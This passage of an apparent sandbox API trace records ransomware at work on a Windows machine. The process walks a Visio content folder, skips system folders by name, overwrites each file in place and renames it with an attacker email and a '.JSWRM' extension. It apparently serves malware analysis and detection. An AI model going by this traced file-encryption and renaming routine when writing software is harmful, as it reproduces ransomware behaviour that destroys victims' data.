Content\\1033\\CABNT_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_visio2013_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.254] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=81371) returned 1 [0146.254] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.255] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x13dd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x13dd0, lpOverlapped=0x0) returned 1 [0146.263] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.263] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x13dd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x13dd0, lpOverlapped=0x0) returned 1 [0146.264] CloseHandle (hObject=0x314) returned 1 [0146.264] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_visio2013_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_VISIO2013_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_visio2013_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.265] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23ad924, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x23ad924, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x23ad924, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1122a3, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CALNDR_M.VSSX", cAlternateFileName="CALNDR~2.VSS")) returned 1 [0146.265] lstrcmpiW (lpString1="CALNDR_M.VSSX", lpString2=".") returned 1 [0146.265] lstrcmpiW (lpString1="CALNDR_M.VSSX", lpString2="..") returned 1 [0146.265] lstrcmpiW (lpString1="CALNDR_M.VSSX", lpString2="...") returned 1 [0146.265] lstrcmpiW (lpString1="CALNDR_M.VSSX", lpString2="windows") returned -1 [0146.265] lstrcmpiW (lpString1="CALNDR_M.VSSX", lpString2="recovery") returned -1 [0146.265] lstrcmpiW (lpString1="CALNDR_M.VSSX", lpString2="perflogs") returned -1 [0146.265] lstrcmpiW (lpString1="CALNDR_M.VSSX", lpString2="documents and settings") returned -1 [0146.265] lstrcmpiW (lpString1="CALNDR_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.265] lstrcmpiW (lpString1="CALNDR_M.VSSX", lpString2="system volume information") returned -1 [0146.265] lstrcmpiW (lpString1="CALNDR_M.VSSX", lpString2="msocache") returned -1 [0146.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALNDR_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALNDR_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.266] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1122979) returned 1 [0146.266] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.267] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0146.281] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.281] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0146.282] CloseHandle (hObject=0x314) returned 1 [0146.282] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.283] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7d40, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CALNDR_M.VSTX", cAlternateFileName="CALNDR~1.VST")) returned 1 [0146.283] lstrcmpiW (lpString1="CALNDR_M.VSTX", lpString2=".") returned 1 [0146.283] lstrcmpiW (lpString1="CALNDR_M.VSTX", lpString2="..") returned 1 [0146.283] lstrcmpiW (lpString1="CALNDR_M.VSTX", lpString2="...") returned 1 [0146.283] lstrcmpiW (lpString1="CALNDR_M.VSTX", lpString2="windows") returned -1 [0146.283] lstrcmpiW (lpString1="CALNDR_M.VSTX", lpString2="recovery") returned -1 [0146.283] lstrcmpiW (lpString1="CALNDR_M.VSTX", lpString2="perflogs") returned -1 [0146.283] lstrcmpiW (lpString1="CALNDR_M.VSTX", lpString2="documents and settings") returned -1 [0146.283] lstrcmpiW (lpString1="CALNDR_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.283] lstrcmpiW (lpString1="CALNDR_M.VSTX", lpString2="system volume information") returned -1 [0146.283] lstrcmpiW (lpString1="CALNDR_M.VSTX", lpString2="msocache") returned -1 [0146.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALNDR_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALNDR_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.284] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=32064) returned 1 [0146.285] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.285] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7d40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x7d40, lpOverlapped=0x0) returned 1 [0146.292] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.292] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7d40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x7d40, lpOverlapped=0x0) returned 1 [0146.293] CloseHandle (hObject=0x314) returned 1 [0146.294] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.295] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f0eea1, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1f0eea1, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1f0eea1, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x111de5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CALNDR_U.VSSX", cAlternateFileName="CALNDR~1.VSS")) returned 1 [0146.295] lstrcmpiW (lpString1="CALNDR_U.VSSX", lpString2=".") returned 1 [0146.295] lstrcmpiW (lpString1="CALNDR_U.VSSX", lpString2="..") returned 1 [0146.295] lstrcmpiW (lpString1="CALNDR_U.VSSX", lpString2="...") returned 1 [0146.295] lstrcmpiW (lpString1="CALNDR_U.VSSX", lpString2="windows") returned -1 [0146.295] lstrcmpiW (lpString1="CALNDR_U.VSSX", lpString2="recovery") returned -1 [0146.295] lstrcmpiW (lpString1="CALNDR_U.VSSX", lpString2="perflogs") returned -1 [0146.295] lstrcmpiW (lpString1="CALNDR_U.VSSX", lpString2="documents and settings") returned -1 [0146.295] lstrcmpiW (lpString1="CALNDR_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.295] lstrcmpiW (lpString1="CALNDR_U.VSSX", lpString2="system volume information") returned -1 [0146.295] lstrcmpiW (lpString1="CALNDR_U.VSSX", lpString2="msocache") returned -1 [0146.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALNDR_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALNDR_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.297] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1121765) returned 1 [0146.297] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.297] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0146.311] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.311] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0146.311] CloseHandle (hObject=0x314) returned 1 [0146.311] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.313] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7cfa, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CALNDR_U.VSTX", cAlternateFileName="CALNDR~2.VST")) returned 1 [0146.313] lstrcmpiW (lpString1="CALNDR_U.VSTX", lpString2=".") returned 1 [0146.313] lstrcmpiW (lpString1="CALNDR_U.VSTX", lpString2="..") returned 1 [0146.313] lstrcmpiW (lpString1="CALNDR_U.VSTX", lpString2="...") returned 1 [0146.313] lstrcmpiW (lpString1="CALNDR_U.VSTX", lpString2="windows") returned -1 [0146.313] lstrcmpiW (lpString1="CALNDR_U.VSTX", lpString2="recovery") returned -1 [0146.313] lstrcmpiW (lpString1="CALNDR_U.VSTX", lpString2="perflogs") returned -1 [0146.313] lstrcmpiW (lpString1="CALNDR_U.VSTX", lpString2="documents and settings") returned -1 [0146.313] lstrcmpiW (lpString1="CALNDR_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.313] lstrcmpiW (lpString1="CALNDR_U.VSTX", lpString2="system volume information") returned -1 [0146.313] lstrcmpiW (lpString1="CALNDR_U.VSTX", lpString2="msocache") returned -1 [0146.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALNDR_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALNDR_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.315] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=31994) returned 1 [0146.315] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.315] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7cf0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x7cf0, lpOverlapped=0x0) returned 1 [0146.321] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.321] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x7cf0, lpOverlapped=0x0) returned 1 [0146.322] CloseHandle (hObject=0x314) returned 1 [0146.322] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALNDR_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calndr_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.324] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3437c9a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3437c9a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3437c9a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x166fd, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CALOUT_M.VSSX", cAlternateFileName="CALOUT~1.VSS")) returned 1 [0146.324] lstrcmpiW (lpString1="CALOUT_M.VSSX", lpString2=".") returned 1 [0146.324] lstrcmpiW (lpString1="CALOUT_M.VSSX", lpString2="..") returned 1 [0146.324] lstrcmpiW (lpString1="CALOUT_M.VSSX", lpString2="...") returned 1 [0146.324] lstrcmpiW (lpString1="CALOUT_M.VSSX", lpString2="windows") returned -1 [0146.324] lstrcmpiW (lpString1="CALOUT_M.VSSX", lpString2="recovery") returned -1 [0146.324] lstrcmpiW (lpString1="CALOUT_M.VSSX", lpString2="perflogs") returned -1 [0146.324] lstrcmpiW (lpString1="CALOUT_M.VSSX", lpString2="documents and settings") returned -1 [0146.324] lstrcmpiW (lpString1="CALOUT_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.324] lstrcmpiW (lpString1="CALOUT_M.VSSX", lpString2="system volume information") returned -1 [0146.324] lstrcmpiW (lpString1="CALOUT_M.VSSX", lpString2="msocache") returned -1 [0146.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALOUT_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALOUT_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALOUT_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALOUT_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALOUT_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALOUT_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALOUT_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calout_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.325] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=91901) returned 1 [0146.325] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.326] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x166f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x166f0, lpOverlapped=0x0) returned 1 [0146.366] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.366] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x166f0, 